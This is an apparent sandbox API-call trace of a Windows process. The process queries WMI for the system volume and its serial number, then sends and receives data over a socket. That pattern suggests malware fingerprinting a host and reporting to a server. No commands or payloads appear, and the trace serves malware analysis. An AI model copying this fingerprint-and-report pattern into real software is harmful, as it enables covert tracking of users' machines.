	[0258.732] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x5fae8b4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae8b0 | out: ppvObject=0x5fae8b0*=0x608decc) returned 0x0
	[0258.732] WbemLocator:IUnknown:Release (This=0x586f1c) returned 0x2
	[0258.733] IUnknown:AddRef (This=0x608decc) returned 0x3
	[0258.733] IEnumWbemClassObject:Reset (This=0x608decc) returned 0x0
	[0258.734] IUnknown:Release (This=0x608decc) returned 0x2
	[0258.734] CoGetContextToken (in: pToken=0x5fae76c | out: pToken=0x5fae76c) returned 0x0
	[0258.734] IUnknown:AddRef (This=0x608decc) returned 0x3
	[0258.734] IEnumWbemClassObject:Next (in: This=0x608decc, lTimeout=-1, uCount=0x1, apObjects=0x4f1530, puReturned=0x2fbd790 | out: apObjects=0x4f1530*=0x608df08, puReturned=0x2fbd790*=0x1) returned 0x0
	[0258.782] IUnknown:QueryInterface (in: This=0x608df08, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadd78 | out: ppvObject=0x5fadd78*=0x608df08) returned 0x0
	[0258.782] IUnknown:QueryInterface (in: This=0x608df08, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadd34 | out: ppvObject=0x5fadd34*=0x0) returned 0x80004002
	[0258.783] IUnknown:QueryInterface (in: This=0x608df08, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadc28 | out: ppvObject=0x5fadc28*=0x0) returned 0x80004002
	[0258.783] IUnknown:AddRef (This=0x608df08) returned 0x3
	[0258.783] CoGetContextToken (in: pToken=0x5fadbc0 | out: pToken=0x5fadbc0) returned 0x0
	[0258.783] IUnknown:QueryInterface (in: This=0x608df08, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadba8 | out: ppvObject=0x5fadba8*=0x608df0c) returned 0x0
	[0258.783] IMarshal:GetUnmarshalClass (in: This=0x608df0c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadbb0 | out: pCid=0x5fadbb0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0258.783] IUnknown:Release (This=0x608df0c) returned 0x3
	[0258.784] CoGetContextToken (in: pToken=0x5fadbb8 | out: pToken=0x5fadbb8) returned 0x0
	[0258.784] IUnknown:AddRef (This=0x608df08) returned 0x4
	[0258.784] IUnknown:QueryInterface (in: This=0x608df08, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadc2c | out: ppvObject=0x5fadc2c*=0x0) returned 0x80004002
	[0258.784] IUnknown:Release (This=0x608df08) returned 0x3
	[0258.784] IUnknown:Release (This=0x608df08) returned 0x2
	[0258.784] CoGetContextToken (in: pToken=0x5fae018 | out: pToken=0x5fae018) returned 0x0
	[0258.784] CoGetContextToken (in: pToken=0x5fadfd8 | out: pToken=0x5fadfd8) returned 0x0
	[0258.784] IUnknown:AddRef (This=0x608df08) returned 0x3
	[0258.784] IUnknown:QueryInterface (in: This=0x608df08, riid=0x5fae054*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5fae050 | out: ppvObject=0x5fae050*=0x608df08) returned 0x0
	[0258.784] IUnknown:Release (This=0x608df08) returned 0x3
	[0258.784] IUnknown:Release (This=0x608df08) returned 0x2
	[0258.785] IUnknown:Release (This=0x608df08) returned 0x1
	[0258.785] IUnknown:Release (This=0x608decc) returned 0x2
	[0258.785] CoGetContextToken (in: pToken=0x5fae8fc | out: pToken=0x5fae8fc) returned 0x0
	[0258.785] IUnknown:AddRef (This=0x608df08) returned 0x2
	[0258.785] IWbemClassObject:Get (in: This=0x608df08, wszName="__GENUS", lFlags=0, pVal=0x5fae978*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5faea2c*=0, plFlavor=0x5faea28*=0 | out: pVal=0x5fae978*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5faea2c*=3, plFlavor=0x5faea28*=64) returned 0x0
	[0258.785] IWbemClassObject:Get (in: This=0x608df08, wszName="__PATH", lFlags=0, pVal=0x5fae958*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5faea10*=0, plFlavor=0x5faea0c*=0 | out: pVal=0x5fae958*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x5faea10*=8, plFlavor=0x5faea0c*=64) returned 0x0
	[0258.785] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0258.785] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae9b0 | out: ppv=0x5fae9b0*=0x4a8dec) returned 0x0
	[0258.786] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae9a8 | out: pAptType=0x5fae9a8*=1) returned 0x0
	[0258.786] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae9ac | out: ppvObject=0x5fae9ac*=0x0) returned 0x80004002
	[0258.786] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0258.795] CoGetClassObject (in: rclsid=0x563d04*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae4c8 | out: ppv=0x5fae4c8*=0x608cb70) returned 0x0
	[0258.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x608cb70, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae2f8 | out: ppvObject=0x5fae2f8*=0x0) returned 0x80004002
	[0258.795] WbemDefPath:IClassFactory:CreateInstance (in: This=0x608cb70, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae330 | out: ppvObject=0x5fae330*=0x608e0a0) returned 0x0
	[0258.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e0a0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae0d4 | out: ppvObject=0x5fae0d4*=0x608e0a0) returned 0x0
	[0258.796] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e0a0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae090 | out: ppvObject=0x5fae090*=0x0) returned 0x80004002
	[0258.796] WbemDefPath:IUnknown:AddRef (This=0x608e0a0) returned 0x3
	[0258.796] CoGetContextToken (in: pToken=0x5fadf1c | out: pToken=0x5fadf1c) returned 0x0
	[0258.796] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e0a0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf04 | out: ppvObject=0x5fadf04*=0x58f800) returned 0x0
	[0258.796] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x58f800, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadf0c | out: pCid=0x5fadf0c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.796] WbemDefPath:IUnknown:Release (This=0x58f800) returned 0x3
	[0258.796] CoGetContextToken (in: pToken=0x5fadf14 | out: pToken=0x5fadf14) returned 0x0
	[0258.796] WbemDefPath:IUnknown:AddRef (This=0x608e0a0) returned 0x4
	[0258.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e0a0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf88 | out: ppvObject=0x5fadf88*=0x0) returned 0x80004002
	[0258.797] WbemDefPath:IUnknown:Release (This=0x608e0a0) returned 0x3
	[0258.797] WbemDefPath:IUnknown:Release (This=0x608e0a0) returned 0x2
	[0258.797] WbemDefPath:IUnknown:Release (This=0x608cb70) returned 0x0
	[0258.797] WbemDefPath:IUnknown:Release (This=0x608e0a0) returned 0x1
	[0258.797] CoGetContextToken (in: pToken=0x5fae7c4 | out: pToken=0x5fae7c4) returned 0x0
	[0258.797] CoGetContextToken (in: pToken=0x5fae784 | out: pToken=0x5fae784) returned 0x0
	[0258.797] WbemDefPath:IUnknown:AddRef (This=0x608e0a0) returned 0x2
	[0258.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e0a0, riid=0x5fae800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae7fc | out: ppvObject=0x5fae7fc*=0x608e0a0) returned 0x0
	[0258.797] WbemDefPath:IUnknown:Release (This=0x608e0a0) returned 0x2
	[0258.797] WbemDefPath:IUnknown:Release (This=0x608e0a0) returned 0x1
	[0258.798] CoGetContextToken (in: pToken=0x5fae844 | out: pToken=0x5fae844) returned 0x0
	[0258.798] CoGetContextToken (in: pToken=0x5fae804 | out: pToken=0x5fae804) returned 0x0
	[0258.798] WbemDefPath:IUnknown:AddRef (This=0x608e0a0) returned 0x2
	[0258.798] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e0a0, riid=0x5fae880*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae87c | out: ppvObject=0x5fae87c*=0x608e0a0) returned 0x0
	[0258.798] WbemDefPath:IUnknown:Release (This=0x608e0a0) returned 0x2
	[0258.798] WbemDefPath:IUnknown:AddRef (This=0x608e0a0) returned 0x3
	[0258.798] WbemDefPath:IWbemPath:SetText (This=0x608e0a0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0258.798] WbemDefPath:IUnknown:Release (This=0x608e0a0) returned 0x2
	[0258.798] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608d3d8, puCount=0x5fae9e4 | out: puCount=0x5fae9e4*=0x2) returned 0x0
	[0258.798] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5fae9e0*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9e0*=0x17, pszText=0x0) returned 0x0
	[0258.798] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5fae9e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.798] CoGetContextToken (in: pToken=0x5fae76c | out: pToken=0x5fae76c) returned 0x0
	[0258.798] IUnknown:AddRef (This=0x608decc) returned 0x3
	[0258.798] IEnumWbemClassObject:Next (in: This=0x608decc, lTimeout=-1, uCount=0x1, apObjects=0x4f1530, puReturned=0x2fbd790 | out: apObjects=0x4f1530*=0x0, puReturned=0x2fbd790*=0x0) returned 0x1
	[0258.804] IUnknown:Release (This=0x608decc) returned 0x2
	[0258.804] CoGetContextToken (in: pToken=0x5fae8b4 | out: pToken=0x5fae8b4) returned 0x0
	[0258.804] WbemLocator:IUnknown:Release (This=0x586f1c) returned 0x1
	[0258.804] IUnknown:Release (This=0x608decc) returned 0x0
	[0258.826] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608d3d8, puCount=0x5faea58 | out: puCount=0x5faea58*=0x2) returned 0x0
	[0258.826] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea54*=0x0, pszText=0x0 | out: puBuffLength=0x5faea54*=0x17, pszText=0x0) returned 0x0
	[0258.826] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea54*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea54*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.826] IWbemClassObject:Get (in: This=0x608df08, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbec44*=0, plFlavor=0x2fbec48*=0 | out: pVal=0x5faea14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2fbec44*=8, plFlavor=0x2fbec48*=64) returned 0x0
	[0258.826] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0258.827] IWbemClassObject:Get (in: This=0x608df08, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbec44*=8, plFlavor=0x2fbec48*=64 | out: pVal=0x5faea18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2fbec44*=8, plFlavor=0x2fbec48*=64) returned 0x0
	[0258.827] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0258.827] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608d3d8, puCount=0x5faea58 | out: puCount=0x5faea58*=0x2) returned 0x0
	[0258.827] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea54*=0x0, pszText=0x0 | out: puBuffLength=0x5faea54*=0x17, pszText=0x0) returned 0x0
	[0258.827] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea54*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea54*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.827] IWbemClassObject:Get (in: This=0x608df08, wszName="__CLASS", lFlags=0, pVal=0x5faea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbecfc*=0, plFlavor=0x2fbed00*=0 | out: pVal=0x5faea14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2fbecfc*=8, plFlavor=0x2fbed00*=64) returned 0x0
	[0258.827] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0258.827] IWbemClassObject:Get (in: This=0x608df08, wszName="__CLASS", lFlags=0, pVal=0x5faea18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbecfc*=8, plFlavor=0x2fbed00*=64 | out: pVal=0x5faea18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2fbecfc*=8, plFlavor=0x2fbed00*=64) returned 0x0
	[0258.827] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0258.827] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608d3d8, puCount=0x5faea48 | out: puCount=0x5faea48*=0x2) returned 0x0
	[0258.827] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea44*=0x0, pszText=0x0 | out: puBuffLength=0x5faea44*=0x17, pszText=0x0) returned 0x0
	[0258.827] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea44*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea44*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.827] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608d3d8, puCount=0x5faea48 | out: puCount=0x5faea48*=0x2) returned 0x0
	[0258.827] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea44*=0x0, pszText=0x0 | out: puBuffLength=0x5faea44*=0x17, pszText=0x0) returned 0x0
	[0258.827] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea44*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea44*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.828] IWbemClassObject:GetNames (in: This=0x608df08, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5faea0c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5fae9d8 | out: pNames=0x5fae9d8*="\x01ƀ\x04") returned 0x0
	[0258.828] SafeArrayGetDim (psa=0x586488) returned 0x1
	[0258.828] SafeArrayGetDim (psa=0x586488) returned 0x1
	[0258.828] SafeArrayGetLBound (in: psa=0x586488, nDim=0x1, plLbound=0x5fae5d4 | out: plLbound=0x5fae5d4) returned 0x0
	[0258.828] IWbemClassObject:Get (in: This=0x608df08, wszName="__GENUS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbf594*=0, plFlavor=0x2fbf598*=0 | out: pVal=0x5faea04*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x2fbf594*=3, plFlavor=0x2fbf598*=64) returned 0x0
	[0258.828] IWbemClassObject:Get (in: This=0x608df08, wszName="__CLASS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbf5c8*=0, plFlavor=0x2fbf5cc*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2fbf5c8*=8, plFlavor=0x2fbf5cc*=64) returned 0x0
	[0258.828] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0258.828] IWbemClassObject:Get (in: This=0x608df08, wszName="__SUPERCLASS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbf61c*=0, plFlavor=0x2fbf620*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x2fbf61c*=8, plFlavor=0x2fbf620*=64) returned 0x0
	[0258.828] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
	[0258.829] IWbemClassObject:Get (in: This=0x608df08, wszName="__DYNASTY", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbf678*=0, plFlavor=0x2fbf67c*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x2fbf678*=8, plFlavor=0x2fbf67c*=64) returned 0x0
	[0258.829] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0258.829] IWbemClassObject:Get (in: This=0x608df08, wszName="__RELPATH", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbf6e4*=0, plFlavor=0x2fbf6e8*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x2fbf6e4*=8, plFlavor=0x2fbf6e8*=64) returned 0x0
	[0258.829] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0258.829] IWbemClassObject:Get (in: This=0x608df08, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbf7b8*=0, plFlavor=0x2fbf7bc*=0 | out: pVal=0x5faea04*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x2fbf7b8*=3, plFlavor=0x2fbf7bc*=64) returned 0x0
	[0258.829] IWbemClassObject:Get (in: This=0x608df08, wszName="__DERIVATION", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbf7ec*=0, plFlavor=0x2fbf7f0*=0 | out: pVal=0x5faea04*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x586488*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x5434a8, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x2fbf7ec*=8200, plFlavor=0x2fbf7f0*=64) returned 0x0
	[0258.830] IWbemClassObject:Get (in: This=0x608df08, wszName="__SERVER", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbf950*=0, plFlavor=0x2fbf954*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x2fbf950*=8, plFlavor=0x2fbf954*=64) returned 0x0
	[0258.830] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0258.830] IWbemClassObject:Get (in: This=0x608df08, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbf99c*=0, plFlavor=0x2fbf9a0*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2fbf99c*=8, plFlavor=0x2fbf9a0*=64) returned 0x0
	[0258.830] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0258.830] IWbemClassObject:Get (in: This=0x608df08, wszName="__PATH", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbf9ec*=0, plFlavor=0x2fbf9f0*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x2fbf9ec*=8, plFlavor=0x2fbf9f0*=64) returned 0x0
	[0258.830] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0258.830] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608d3d8, puCount=0x5faea84 | out: puCount=0x5faea84*=0x2) returned 0x0
	[0258.830] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea80*=0x0, pszText=0x0 | out: puBuffLength=0x5faea80*=0x17, pszText=0x0) returned 0x0
	[0258.830] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.830] IWbemClassObject:Get (in: This=0x608df08, wszName="SerialNumber", lFlags=0, pVal=0x5faea40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbfb40*=0, plFlavor=0x2fbfb44*=0 | out: pVal=0x5faea40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x2fbfb40*=19, plFlavor=0x2fbfb44*=0) returned 0x0
	[0258.830] IWbemClassObject:Get (in: This=0x608df08, wszName="SerialNumber", lFlags=0, pVal=0x5faeaf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fbfb40*=19, plFlavor=0x2fbfb44*=0 | out: pVal=0x5faeaf8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x2fbfb40*=19, plFlavor=0x2fbfb44*=0) returned 0x0
	[0258.834] send (s=0x424, buf=0x2fc0704*, len=36, flags=0) returned 36
	[0258.834] GetLastError () returned 0x0
	[0258.834] recv (in: s=0x424, buf=0x2fac898, len=502, flags=0 | out: buf=0x2fac898*) returned 88
	[0259.189] GetLastError () returned 0x0
	[0259.210] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0259.211] send (s=0x424, buf=0x2fcbc3c*, len=34, flags=0) returned 34
	[0259.211] GetLastError () returned 0x0
	[0259.211] recv (in: s=0x424, buf=0x2fac898, len=502, flags=0 | out: buf=0x2fac898*) returned 121
	[0260.191] GetLastError () returned 0x0
